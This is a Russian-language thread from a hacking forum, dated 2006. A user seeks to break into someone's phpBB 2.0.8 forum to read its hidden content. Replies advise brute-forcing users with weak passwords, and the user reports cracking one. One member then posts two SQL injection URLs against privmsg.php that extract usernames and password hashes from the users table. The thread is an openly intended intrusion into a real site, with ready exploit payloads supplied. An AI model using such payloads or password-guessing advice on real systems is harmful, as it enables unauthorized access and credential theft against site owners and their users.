ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

phpBB 2.0.8
  #1  
Старый 10.05.2006, 23:56
Аватар для crazyhacker
crazyhacker
Новичок
Регистрация: 06.03.2006
Сообщений: 5
Провел на форуме:
23518

Репутация: 0
По умолчанию phpBB 2.0.8

Есть сабж такой версии. Админка закрыта BASIC-AUTH. Сам форум тоже наполовину закрыт. Виден только список пользователей и подфорумы.

Только что подставил
profile.php?mode=register&agreed=true и зарегился. Но активировать должен админ. Как быть в таком случае?

Что вообще можно сделать с ним? Цель - получить инфу в форуме.

Попробовал несколько способов 2.0.10 и выше - не сработали
 

  #2  
Старый 11.05.2006, 00:06
Аватар для LoFFi
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

Ниче ты тут не сделаешь без активации.... Поищи уже активных юзверей по паролям типа 123, qwerty и т.д. а дальше можно и сплоитом.
 

  #3  
Старый 11.05.2006, 00:20
Аватар для crazyhacker
crazyhacker
Новичок
Регистрация: 06.03.2006
Сообщений: 5
Провел на форуме:
23518

Репутация: 0
По умолчанию

да я вот и ищу. думал может еще какой то способ есть. ведь форум то старый. хотя некоторые заплатки поставили. а если найду пасс для юзеря - то впринципе уже ничего и ненадо будет.
=========================
УРА! Отбрутил пасс. Как теперь можно копнуть в сторону админа?

Последний раз редактировалось crazyhacker; 11.05.2006 в 00:42..
 

  #4  
Старый 11.05.2006, 00:53
Аватар для LoFFi
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию

Программа: phpBB 2.0.8

Опасность: Высокая

Наличие эксплоита: Да

Описание: Уязвимость в проверке правильности входных данных обнаружена в phpBB в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код.

Пример:
_http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND%20pm
.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password, null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,nu
ll,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/*

/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*

URL производителя:
http://www.phpbb.com/
 

  #5  
Старый 11.05.2006, 19:32
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Kez делал брут,так что в поиск по его созданным темам и бруть пользователей с простыми пассами.
 

  #6  
Старый 11.05.2006, 20:48
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

А воще qBiN Яисал уязвимости форумов php-bb до последней версии. http://www.forum.antichat.ru/thread12610.htmlю
Закрывайте тему.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 

  #7  
Старый 12.05.2006, 16:03
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Цитата:
А воще qBiN Яисал уязвимости форумов php-bb до последней версии.
"Яисал" типа я писал? Учимся писать попонятнее)
Тема закрыта,ибо все остальное можно найти в поиске\прикрепленных темах
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
exploit phpBB 2.0.19 ( by SpiderZ ) liauliau Форумы 21 13.01.2007 23:01
Вопрос про эксплоит на форуме phpbb 2.0.8 dyx Форумы 2 12.04.2005 00:12
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group onyx3 Форумы 38 15.02.2005 16:25
Пара вопросов по Phpbb 2.0.8 и форуму Web Wiz R!ikoSHeTT Форумы 1 13.01.2005 08:53
Xss в phpBB 2.0.8 Форумы 2 06.08.2004 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ